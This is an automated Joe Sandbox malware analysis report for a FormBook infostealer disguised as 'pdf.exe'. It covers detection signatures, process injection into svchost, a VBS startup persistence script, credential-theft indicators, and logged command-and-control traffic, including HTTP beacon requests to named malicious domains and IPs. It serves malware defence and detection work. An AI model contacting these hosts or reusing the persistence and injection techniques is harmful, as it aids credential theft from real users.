Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
5674656777985-069688574654 pdf.exe

Overview

General Information

Sample name:5674656777985-069688574654 pdf.exe
Analysis ID:1558148
MD5:8e38e2141423c1bdf6899ef2aaf078f8
SHA1:ecaa7e2bd0e59981891f6ec4c34c67ee32843d2d
SHA256:ff964e11539853b46a4d4c0f9bbd111f4fdce259ef470e88ae59802d82533b36
Tags:exeuser-zn03zh
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Drops VBS files to the startup folder
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sigma detected: WScript or CScript Dropper
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected potential crypto function
Drops PE files
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evaded block containing many API calls
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Uncommon Svchost Parent Process
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • 5674656777985-069688574654 pdf.exe (PID: 7264 cmdline: "C:\Users\user\Desktop\5674656777985-069688574654 pdf.exe" MD5: 8E38E2141423C1BDF6899EF2AAF078F8)
    • cunila.exe (PID: 7308 cmdline: "C:\Users\user\Desktop\5674656777985-069688574654 pdf.exe" MD5: 8E38E2141423C1BDF6899EF2AAF078F8)
      • svchost.exe (PID: 7340 cmdline: "C:\Users\user\Desktop\5674656777985-069688574654 pdf.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
        • XzXxPWzavnqD.exe (PID: 3720 cmdline: "C:\Program Files (x86)\sTBuqAdIaUozjpXtjEAuwZfiAWuPNaaKrGLePbaBz\XzXxPWzavnqD.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • upnpcont.exe (PID: 7808 cmdline: "C:\Windows\SysWOW64\upnpcont.exe" MD5: B0B77651795747C81A50BEFA60922B8E)
            • XzXxPWzavnqD.exe (PID: 4628 cmdline: "C:\Program Files (x86)\sTBuqAdIaUozjpXtjEAuwZfiAWuPNaaKrGLePbaBz\XzXxPWzavnqD.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
            • firefox.exe (PID: 8040 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • wscript.exe (PID: 7432 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\cunila.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • cunila.exe (PID: 7480 cmdline: "C:\Users\user\AppData\Local\retrofit\cunila.exe" MD5: 8E38E2141423C1BDF6899EF2AAF078F8)
      • svchost.exe (PID: 7576 cmdline: "C:\Users\user\AppData\Local\retrofit\cunila.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000A.00000002.3082710229.0000000002250000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000007.00000002.2341433295.0000000000400000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000002.00000002.2332196683.0000000006140000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        0000000A.00000002.3082947555.0000000002700000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          0000000A.00000002.3082882435.00000000026B0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            Click to see the 4 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            7.2.svchost.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
              2.2.svchost.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
                2.2.svchost.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
                  7.2.svchost.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security

                    Sigma Signatures

                    System Summary

                    barindex
                    Sigma detected: WScript or CScript Dropper
                    Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\cunila.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\cunila.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\cunila.vbs" , ProcessId: 7432, ProcessName: wscript.exe
                    Sigma detected: Uncommon Svchost Parent Process
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\5674656777985-069688574654 pdf.exe", CommandLine: "C:\Users\user\Desktop\5674656777985-069688574654 pdf.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\5674656777985-069688574654 pdf.exe", ParentImage: C:\Users\user\AppData\Local\retrofit\cunila.exe, ParentProcessId: 7308, ParentProcessName: cunila.exe, ProcessCommandLine: "C:\Users\user\Desktop\5674656777985-069688574654 pdf.exe", ProcessId: 7340, ProcessName: svchost.exe
                    Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
                    Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\cunila.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\cunila.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\cunila.vbs" , ProcessId: 7432, ProcessName: wscript.exe
                    Sigma detected: Windows Processes Suspicious Parent Directory
                    Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\5674656777985-069688574654 pdf.exe", CommandLine: "C:\Users\user\Desktop\5674656777985-069688574654 pdf.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\5674656777985-069688574654 pdf.exe", ParentImage: C:\Users\user\AppData\Local\retrofit\cunila.exe, ParentProcessId: 7308, ParentProcessName: cunila.exe, ProcessCommandLine: "C:\Users\user\Desktop\5674656777985-069688574654 pdf.exe", ProcessId: 7340, ProcessName: svchost.exe

                    Data Obfuscation

                    barindex
                    Sigma detected: Drops script at startup location
                    Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\AppData\Local\retrofit\cunila.exe, ProcessId: 7308, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\cunila.vbs

                    Suricata Signatures

                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-11-19T03:56:33.741883+010028554641A Network Trojan was detected192.168.2.449890217.160.0.20080TCP
                    2024-11-19T03:56:36.651652+010028554641A Network Trojan was detected192.168.2.449903217.160.0.20080TCP
                    2024-11-19T03:56:39.430836+010028554641A Network Trojan was detected192.168.2.449914217.160.0.20080TCP
                    2024-11-19T03:56:48.389553+010028554641A Network Trojan was detected192.168.2.449961203.161.46.20580TCP
                    2024-11-19T03:56:50.917047+010028554641A Network Trojan was detected192.168.2.449973203.161.46.20580TCP
                    2024-11-19T03:56:53.471522+010028554641A Network Trojan was detected192.168.2.449985203.161.46.20580TCP
                    2024-11-19T03:57:02.790158+010028554641A Network Trojan was detected192.168.2.45001691.226.30.380TCP
                    2024-11-19T03:57:04.996899+010028554641A Network Trojan was detected192.168.2.45001791.226.30.380TCP
                    2024-11-19T03:57:07.534889+010028554641A Network Trojan was detected192.168.2.45001891.226.30.380TCP
                    2024-11-19T03:57:16.067744+010028554641A Network Trojan was detected192.168.2.450020104.21.15.10080TCP
                    2024-11-19T03:57:18.626444+010028554641A Network Trojan was detected192.168.2.450021104.21.15.10080TCP
                    2024-11-19T03:57:21.584196+010028554641A Network Trojan was detected192.168.2.450022104.21.15.10080TCP

                    Joe Sandbox Signatures

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Multi AV Scanner detection for dropped file
                    Source: C:\Users\user\AppData\Local\retrofit\cunila.exeReversingLabs: Detection: 76%
                    Multi AV Scanner detection for submitted file
                    Source: 5674656777985-069688574654 pdf.exeReversingLabs: Detection: 76%
                    Source: 5674656777985-069688574654 pdf.exeVirustotal: Detection: 55%Perma Link
                    Yara detected FormBook
                    Source: Yara matchFile source: 7.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000A.00000002.3082710229.0000000002250000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000007.00000002.2341433295.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.2332196683.0000000006140000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000A.00000002.3082947555.0000000002700000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000A.00000002.3082882435.00000000026B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000B.00000002.3083758728.0000000002A60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.2322322646.0000000004090000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.2321538525.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.3084135785.0000000003730000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                    AI detected suspicious sample
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                    Machine Learning detection for dropped file
                    Source: C:\Users\user\AppData\Local\retrofit\cunila.exeJoe Sandbox ML: detected
                    Machine Learning detection for sample
                    Source: 5674656777985-069688574654 pdf.exeJoe Sandbox ML: detected
                    Source: 5674656777985-069688574654 pdf.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                    Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: XzXxPWzavnqD.exe, 00000009.00000002.3082674785.00000000005FE000.00000002.00000001.01000000.00000007.sdmp, XzXxPWzavnqD.exe, 0000000B.00000002.3082673027.00000000005FE000.00000002.00000001.01000000.00000007.sdmp
                    Source: Binary string: wntdll.pdbUGP source: cunila.exe, 00000001.00000003.1858219698.0000000003E70000.00000004.00001000.00020000.00000000.sdmp, cunila.exe, 00000001.00000003.1858872105.0000000003D20000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2321934213.000000000339E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2321934213.0000000003200000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2202865425.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2200514359.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, cunila.exe, 00000004.00000003.1987627802.0000000004260000.00000004.00001000.00020000.00000000.sdmp, cunila.exe, 00000004.00000003.1987959850.00000000040C0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.2341833103.000000000389E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2334643348.0000000003500000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.2341833103.0000000003700000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2332161494.0000000003300000.00000004.00000020.00020000.00000000.sdmp, upnpcont.exe, 0000000A.00000002.3084702957.0000000002E4E000.00000040.00001000.00020000.00000000.sdmp, upnpcont.exe, 0000000A.00000003.2321495418.0000000002955000.00000004.00000020.00020000.00000000.sdmp, upnpcont.exe, 0000000A.00000002.3084702957.0000000002CB0000.00000040.00001000.00020000.00000000.sdmp, upnpcont.exe, 0000000A.00000003.2334099482.0000000002B03000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: wntdll.pdb source: cunila.exe, 00000001.00000003.1858219698.0000000003E70000.00000004.00001000.00020000.00000000.sdmp, cunila.exe, 00000001.00000003.1858872105.0000000003D20000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000002.2321934213.000000000339E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2321934213.0000000003200000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2202865425.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2200514359.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, cunila.exe, 00000004.00000003.1987627802.0000000004260000.00000004.00001000.00020000.00000000.sdmp, cunila.exe, 00000004.00000003.1987959850.00000000040C0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.2341833103.000000000389E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2334643348.0000000003500000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.2341833103.0000000003700000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2332161494.0000000003300000.00000004.00000020.00020000.00000000.sdmp, upnpcont.exe, 0000000A.00000002.3084702957.0000000002E4E000.00000040.00001000.00020000.00000000.sdmp, upnpcont.exe, 0000000A.00000003.2321495418.0000000002955000.00000004.00000020.00020000.00000000.sdmp, upnpcont.exe, 0000000A.00000002.3084702957.0000000002CB0000.00000040.00001000.00020000.00000000.sdmp, upnpcont.exe, 0000000A.00000003.2334099482.0000000002B03000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: upnpcont.pdbGCTL source: svchost.exe, 00000002.00000003.2285675652.0000000002C1A000.00000004.00000020.00020000.00000000.sdmp, XzXxPWzavnqD.exe, 00000009.00000002.3083435571.0000000001187000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: svchost.pdb source: upnpcont.exe, 0000000A.00000002.3085844190.00000000032DC000.00000004.10000000.00040000.00000000.sdmp, upnpcont.exe, 0000000A.00000002.3083101418.0000000002862000.00000004.00000020.00020000.00000000.sdmp, XzXxPWzavnqD.exe, 0000000B.00000002.3084807693.000000000307C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000D.00000002.2626466045.000000003CC3C000.00000004.80000000.00040000.00000000.sdmp
                    Source: Binary string: svchost.pdbUGP source: upnpcont.exe, 0000000A.00000002.3085844190.00000000032DC000.00000004.10000000.00040000.00000000.sdmp, upnpcont.exe, 0000000A.00000002.3083101418.0000000002862000.00000004.00000020.00020000.00000000.sdmp, XzXxPWzavnqD.exe, 0000000B.00000002.3084807693.000000000307C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000D.00000002.2626466045.000000003CC3C000.00000004.80000000.00040000.00000000.sdmp
                    Source: Binary string: upnpcont.pdb source: svchost.exe, 00000002.00000003.2285675652.0000000002C1A000.00000004.00000020.00020000.00000000.sdmp, XzXxPWzavnqD.exe, 00000009.00000002.3083435571.0000000001187000.00000004.00000020.00020000.00000000.sdmp
                    Source: C:\Users\user\Desktop\5674656777985-069688574654 pdf.exeCode function: 0_2_00386CA9 GetFileAttributesW,FindFirstFileW,FindClose,0_2_00386CA9
                    Source: C:\Users\user\Desktop\5674656777985-069688574654 pdf.exeCode function: 0_2_003860DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,0_2_003860DD
                    Source: C:\Users\user\Desktop\5674656777985-069688574654 pdf.exeCode function: 0_2_003863F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,0_2_003863F9
                    Source: C:\Users\user\Desktop\5674656777985-069688574654 pdf.exeCode function: 0_2_0038EB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0038EB60
                    Source: C:\Users\user\Desktop\5674656777985-069688574654 pdf.exeCode function: 0_2_0038F56F FindFirstFileW,FindClose,0_2_0038F56F
                    Source: C:\Users\user\Desktop\5674656777985-069688574654 pdf.exeCode function: 0_2_0038F5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_0038F5FA
                    Source: C:\Users\user\Desktop\5674656777985-069688574654 pdf.exeCode function: 0_2_00391B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00391B2F
                    Source: C:\Users\user\Desktop\5674656777985-069688574654 pdf.exeCode function: 0_2_00391C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00391C8A
                    Source: C:\Users\user\Desktop\5674656777985-069688574654 pdf.exeCode function: 0_2_00391F94 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00391F94
                    Source: C:\Users\user\AppData\Local\retrofit\cunila.exeCode function: 1_2_00D26CA9 GetFileAttributesW,FindFirstFileW,FindClose,1_2_00D26CA9
                    Source: C:\Users\user\AppData\Local\retrofit\cunila.exeCode function: 1_2_00D260DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,1_2_00D260DD
                    Source: C:\Users\user\AppData\Local\retrofit\cunila.exeCode function: 1_2_00D263F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,1_2_00D263F9
                    Source: C:\Users\user\AppData\Local\retrofit\cunila.exeCode function: 1_2_00D2EB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,1_2_00D2EB60
                    Source: C:\Users\user\AppData\Local\retrofit\cunila.exeCode function: 1_2_00D2F5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,1_2_00D2F5FA
                    Source: C:\Users\user\AppData\Local\retrofit\cunila.exeCode function: 1_2_00D2F56F FindFirstFileW,FindClose,1_2_00D2F56F
                    Source: C:\Users\user\AppData\Local\retrofit\cunila.exeCode function: 1_2_00D31B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,1_2_00D31B2F
                    Source: C:\Users\user\AppData\Local\retrofit\cunila.exeCode function: 1_2_00D31C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,1_2_00D31C8A
                    Source: C:\Users\user\AppData\Local\retrofit\cunila.exeCode function: 1_2_00D31F94 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,1_2_00D31F94
                    Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Jump to behavior
                    Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Jump to behavior
                    Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Jump to behavior
                    Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Jump to behavior
                    Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\Jump to behavior
                    Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Jump to behavior

                    Networking

                    barindex
                    Suricata IDS alerts for network traffic
                    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49890 -> 217.160.0.200:80
                    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49903 -> 217.160.0.200:80
                    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49914 -> 217.160.0.200:80
                    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49961 -> 203.161.46.205:80
                    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49985 -> 203.161.46.205:80
                    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49973 -> 203.161.46.205:80
                    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50017 -> 91.226.30.3:80
                    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50021 -> 104.21.15.100:80
                    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50022 -> 104.21.15.100:80
                    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50018 -> 91.226.30.3:80
                    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50016 -> 91.226.30.3:80
                    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50020 -> 104.21.15.100:80
                    Source: Joe Sandbox ViewIP Address: 103.21.221.4 103.21.221.4
                    Source: Joe Sandbox ViewIP Address: 203.161.46.205 203.161.46.205
                    Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                    Source: Joe Sandbox ViewASN Name: ONEANDONE-ASBrauerstrasse48DE ONEANDONE-ASBrauerstrasse48DE
                    Source: Joe Sandbox ViewASN Name: VNPT-AS-VNVNPTCorpVN VNPT-AS-VNVNPTCorpVN
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: C:\Users\user\Desktop\5674656777985-069688574654 pdf.exeCode function: 0_2_00394EB5 InternetReadFile,InternetQueryDataAvailable,InternetReadFile,0_2_00394EB5
                    Source: global trafficHTTP traffic detected: GET /5jq3/?AjEdl=yJNdk0d&5lf8fv8H=yIj9FEq6F0t9Cr9krCaOZjvPrwz7BUN2KJdByNXo/qcAvamNSMMSktux9ZEHvDPxROSkUK3HLwPZkwRHUMJC19uHNEPIeSAiG60jprZNGQbwC+UuOuY/6g8= HTTP/1.1Host: www.tempatmudisini06.clickAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
                    Source: global trafficHTTP traffic detected: GET /bdk6/?5lf8fv8H=PqqBR4APLBjeVAmu2KnBSDyL46X5a3+HeWwKYykJckqyTL6p8r6dck4h/UhP8B2/GHgzxj3GR86X2rSMsvymfcz7/xb/ILUp+u45DggP4jd1Psv37cGY6aI=&AjEdl=yJNdk0d HTTP/1.1Host: www.carsten.studioAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
                    Source: global trafficHTTP traffic detected: GET /cdzk/?5lf8fv8H=21WYxGgPduaG4GNc3Gz+IA1od9in8z0gHg6tlHBueZVX7I1lHyAgjC+unpy7ykSEAjKQ6zcABHQV1iatk3ebx4o/Jp1Tx0HqQTzE31uUJivnuywq0aLhSQU=&AjEdl=yJNdk0d HTTP/1.1Host: www.moumore.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-usConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
